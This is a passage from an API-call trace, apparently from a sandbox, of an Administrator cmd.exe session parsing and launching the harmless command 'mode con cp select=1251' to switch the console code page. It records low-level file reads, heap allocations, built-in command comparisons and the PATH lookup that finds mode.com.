lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c42, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.880] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.880] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0185.880] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.880] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0185.881] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.881] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0185.882] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.882] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.882] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.883] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0185.883] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.883] GetFileType (hFile=0x248) returned 0x3 [0185.883] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.883] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.883] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.883] GetFileType (hFile=0x254) returned 0x3 [0185.883] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.883] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0185.883] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x23aecffd38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd38*=0x18, lpOverlapped=0x0) returned 1 [0185.883] GetProcessHeap () returned 0x1ce53620000 [0185.883] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x4012) returned 0x1ce53628bb0 [0185.884] GetProcessHeap () returned 0x1ce53620000 [0185.884] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0185.884] _wcsicmp (_String1="mode", _String2=")") returned 68 [0185.884] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0185.884] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0185.884] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0185.884] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0185.884] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0185.884] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0185.884] GetProcessHeap () returned 0x1ce53620000 [0185.884] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xb0) returned 0x1ce53626e30 [0185.884] GetProcessHeap () returned 0x1ce53620000 [0185.884] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1a) returned 0x1ce53626c60 [0185.885] GetProcessHeap () returned 0x1ce53620000 [0185.885] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x38) returned 0x1ce53626ef0 [0185.886] GetConsoleOutputCP () returned 0x1b5 [0185.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0185.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.094] GetConsoleTitleW (in: lpConsoleTitle=0x23aecffb80, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0186.435] malloc (_Size=0xffce) returned 0x1ce53810840 [0186.435] ??_V@YAXPEAX@Z () returned 0x1ce53810840 [0186.436] malloc (_Size=0xffce) returned 0x1ce53820820 [0186.436] ??_V@YAXPEAX@Z () returned 0x1ce53820820 [0186.437] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0186.437] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0186.437] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0186.437] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0186.437] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0186.437] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0186.437] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0186.437] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0186.437] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0186.437] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0186.437] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0186.437] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0186.437] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0186.437] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0186.437] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0186.437] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0186.437] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0186.437] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0186.437] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0186.437] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0186.437] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0186.437] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0186.437] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0186.437] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0186.437] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0186.437] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0186.437] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0186.437] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0186.437] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0186.437] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0186.437] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0186.437] _wcsicmp (_String1="mode", _String2="START") returned -6 [0186.438] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0186.438] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0186.438] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0186.438] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0186.438] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0186.438] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0186.438] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0186.438] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0186.438] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0186.438] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0186.438] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0186.438] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0186.438] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0186.438] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0186.438] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0186.438] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0186.438] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0186.438] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0186.438] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0186.438] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0186.438] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0186.438] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0186.438] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0186.438] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0186.438] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0186.438] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0186.438] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0186.438] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0186.438] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0186.438] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0186.438] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0186.439] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0186.439] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0186.439] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0186.439] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0186.439] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0186.439] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0186.439] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0186.439] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0186.439] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0186.439] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0186.439] _wcsicmp (_String1="mode", _String2="START") returned -6 [0186.439] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0186.439] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0186.439] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0186.439] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0186.439] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0186.439] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0186.439] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0186.439] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0186.439] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0186.439] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0186.439] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0186.439] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0186.439] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0186.439] ??_V@YAXPEAX@Z () returned 0x1 [0186.440] GetProcessHeap () returned 0x1ce53620000 [0186.440] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xffde) returned 0x1ce53628bb0 [0186.440] GetProcessHeap () returned 0x1ce53620000 [0186.440] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x42) returned 0x1ce53638ba0 [0186.440] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0186.440] malloc (_Size=0xffce) returned 0x1ce53820820 [0186.440] ??_V@YAXPEAX@Z () returned 0x1ce53820820 [0186.441] GetProcessHeap () returned 0x1ce53620000 [0186.441] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1ffac) returned 0x1ce53638bf0 [0186.442] SetErrorMode (uMode=0x0) returned 0x0 [0186.442] SetErrorMode (uMode=0x1) returned 0x0 [0186.442] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1ce53638c00, lpFilePart=0x23aecff400 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x23aecff400*="system32") returned 0x13 [0186.442] SetErrorMode (uMode=0x0) returned 0x1 [0186.442] GetProcessHeap () returned 0x1ce53620000 [0186.442] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53638bf0, Size=0x42) returned 0x1ce53638bf0 [0186.442] GetProcessHeap () returned 0x1ce53620000 [0186.442] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53638bf0) returned 0x42 [0186.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0186.442] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.442] GetProcessHeap () returned 0x1ce53620000 [0186.442] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1b4) returned 0x1ce53638c50 [0186.442] GetProcessHeap () returned 0x1ce53620000 [0186.442] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x358) returned 0x1ce53638e10 [0186.449] GetProcessHeap () returned 0x1ce53620000 [0186.449] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53638e10, Size=0x1b6) returned 0x1ce53638e10 [0186.449] GetProcessHeap () returned 0x1ce53620000 [0186.449] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53638e10) returned 0x1b6 [0186.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.449] GetProcessHeap () returned 0x1ce53620000 [0186.449] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xe8) returned 0x1ce53638fe0 [0186.449] GetProcessHeap () returned 0x1ce53620000 [0186.449] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53638fe0, Size=0x7e) returned 0x1ce53638fe0 [0186.449] GetProcessHeap () returned 0x1ce53620000 [0186.449] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53638fe0) returned 0x7e [0186.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0186.450] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x23aecff170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23aecff170) returned 0x1ce53639070 [0186.450] GetProcessHeap () returned 0x1ce53620000 [0186.450] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x0, Size=0x28) returned 0x1ce53626a70 [0186.450] FindClose (in: hFindFile=0x1ce53639070 | out: hFindFile=0x1ce53639070) returned 1 [0186.450] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x23aecff170, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x23aecff170) returned 0x1ce53639070 [0186.451] GetProcessHeap () returned 0x1ce53620000 [0186.451] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53626a70, Size=0x8) returned 0x1ce53626a70 [0186.451] FindClose (in: hFindFile=0x1ce53639070 | out: hFindFile=0x1ce53639070) returned 1 [0186.451] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0186.451] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0186.451] ??_V@YAXPEAX@Z () returned 0x1 